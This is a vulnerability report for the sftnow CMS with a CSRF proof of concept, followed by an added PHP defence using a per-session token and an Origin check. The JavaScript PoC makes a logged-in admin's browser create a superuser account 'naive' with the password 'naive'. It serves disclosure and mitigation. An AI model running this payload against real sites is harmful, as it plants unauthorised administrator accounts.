Open
Description
The PoC is the following code which, when clicked by an admin, will generate a superuser account called "naive" whose password is also "naive".
<html>
<script>
function AddUser()
{
var req = new XMLHttpRequest();
var data = "user_login=naive&user_pass=naive&user_email=admin%40qq.com&role_id%5B%5D=1";
req.onload = reqListener;
req.open('post','http://host/sftnow-master/index.php?g=Admin&m=User&a=add_post',true);
req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
req.withCredentials = true;
req.send(data);
function reqListener() {};
}
AddUser();
</script>
</html>
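A server-side check that rejects the request above, as an added example (not part of the original report and not the project's own code). The form-encoded POST with `withCredentials` is sent cross-origin with the admin's session cookie and no preflight, so the handler has to verify a per-session token and the `Origin` header itself. The helper names, the `csrf_token` field, `http://attacker.example` and the sample requests are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not part of the project): per-session CSRF token plus Origin check.

function csrf_issue_token(array &$session): string
{
    // One unpredictable token per session, embedded in every admin form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_request_allowed(array $server, array $post, array $session, string $siteOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // state changes are accepted via POST only
    }
    // Browsers attach Origin to cross-site POSTs; reject any value that is not ours.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $siteOrigin) {
        return false;
    }
    // The session cookie alone proves nothing; the body must carry the token too.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed sample requests.
$session = [];
$token = csrf_issue_token($session);
$site = 'http://host';

$forged = [ // shape of the PoC request: valid session, foreign Origin, no token
    'server' => ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'],
    'post' => ['user_login' => 'naive', 'user_pass' => 'naive', 'role_id' => ['1']],
];
$legit = [ // submitted from the admin panel's own form
    'server' => ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site],
    'post' => ['user_login' => 'editor1', 'role_id' => ['2'], 'csrf_token' => $token],
];

foreach (['forged' => $forged, 'legit' => $legit] as $name => $req) {
    $ok = csrf_request_allowed($req['server'], $req['post'], $session, $site);
    echo $name, ': ', $ok ? 'accepted' : 'rejected (403)', PHP_EOL;
}
```

Setting `SameSite=Lax` or `SameSite=Strict` on the session cookie is a complementary control, since the browser then omits the cookie from this kind of cross-site POST.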